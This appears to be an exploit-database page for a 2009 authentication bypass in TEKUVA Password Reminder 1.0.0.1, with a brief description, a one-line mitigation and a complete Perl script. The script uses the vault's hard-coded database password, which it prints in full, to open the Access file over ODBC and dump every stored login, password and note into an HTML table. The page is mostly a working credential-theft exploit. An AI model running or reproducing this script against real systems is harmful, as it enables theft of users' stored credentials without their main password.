header-logo
Suggest Exploit
vendor:
Password Reminder
by:
iqlusion
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Password Reminder
Affected Version From: 1.0.0.1
Affected Version To: 1.0.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:tekuvacorp:password_reminder:1.0.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

TEKUVA Password Reminder Authentication Bypass

TEKUVA Password Reminder is a password vault that allows users to store all their credentials in one spot and all they have to remember is a single 'main' password to access their vault. Unfortunately, the vault is actually an Access 2007 database that is protected by a password which is hard coded into the program, not the main password. This script connects to the database using the hard coded db password and dumps everything into an HTML table, bypassing the need to enter the main vault password (or use the program at all for that matter).

Mitigation:

Ensure that the application is using strong authentication mechanisms and that the passwords are not hard coded into the program.
Source

Exploit-DB raw data:

#!/usr/bin/perl

# Exploit: TEKUVA Password Reminder Authentication Bypass
# Date: [11/19/2009]
# Author: iqlusion [x+nospam@iqlusion.net]
# Software Link: http://download.cnet.com/Password-Reminder/3000-2064_4-10966598.html
# Version: 1.0.0.1

# Info: TEKUVA Password Reminder is a password vault that allows you to store all
#       your credentials in one spot and all you have to remember is a single 'main'
#       password to access your vault. Unfortunately, the vault is actually an 
#       Access 2007 database that is protected by a password which is hard coded into
#       the program, not your main password.
#
#       This script connects to the database using the hard coded db password and dumps
#       everything into an HTML table, bypassing the need to enter the main vault
#       password (or use the program at all for that matter). Modify values as needed.

# Greetz: quetzal : w00tb0t : sck

use DBI;

$DBFile  = "C:\\Program Files\\TEKUVA\\Password_Reminder\\dtb\\rem.accdb";
$sql = "SELECT app,lgn,pwd,nts FROM pwdrem WHERE idn IS NOT NULL";

$DSN = "DRIVER=Microsoft Access Driver (*.mdb, *.accdb);dbq=$DBFile;pwd=P\@z19r1m";
$dbh = DBI->connect("dbi:ODBC:$DSN")||die print $DBI::errstr;
$dbh->{LongReadLen}=9001;
$qry = $dbh->prepare($sql);
$qry->execute;

open(PWD,">results.html") || die print $!;
print PWD "<table border=1><thead><tr><td>Application/URL</td><td>Login</td><td>Password</td><td>Notes:</td></tr></thead>\n";
while(my($app,$lgn,$pwd,$nts) = $qry->fetchrow_array()){print PWD "<tr><td>$app</td><td>$lgn</td><td>$pwd</td><td>$nts</td></tr>\n";}
print PWD "</table></html>";
print "Passwords dumped to results.html\n\n";